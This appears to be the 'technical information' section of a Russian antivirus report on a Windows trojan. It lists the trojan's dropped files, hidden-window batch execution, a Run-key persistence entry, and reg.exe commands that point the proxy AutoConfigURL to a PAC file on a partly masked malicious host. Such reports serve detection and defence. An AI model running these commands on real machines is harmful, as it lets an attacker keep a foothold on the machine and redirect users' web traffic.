Техническая информация
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'alicert' = 'C:\Users\Update.exe'
- C:\users\date.vbe
- C:\users\ate.exe
- %TEMP%\8bh1lqft.bat
- nul
- %TEMP%\8bh1lqft.bat
- '%WINDIR%\syswow64\wscript.exe' "C:\Users\date.vbe"
- 'C:\users\ate.exe'
- 'C:\users\ate.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8BH1LQFT.bat" "C:\Users\ate.exe" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\8BH1LQFT.bat" "C:\Users\ate.exe" "
- '%WINDIR%\syswow64\reg.exe' query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
- '%WINDIR%\syswow64\findstr.exe' /i /c:"http://www.go####q.top:9999/key.pac"
- '%WINDIR%\syswow64\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /d "http://www.go####q.top:9999/key.pac" /f
- '%WINDIR%\syswow64\reg.exe' query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- '%WINDIR%\syswow64\findstr.exe' /i /c:"C:\Users\Update.exe"
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v alicert /t REG_SZ /d C:\Users\Update.exe /f
- '%WINDIR%\syswow64\ping.exe' 127.1 -n 3
- '%WINDIR%\syswow64\ping.exe' 127.1 -n 2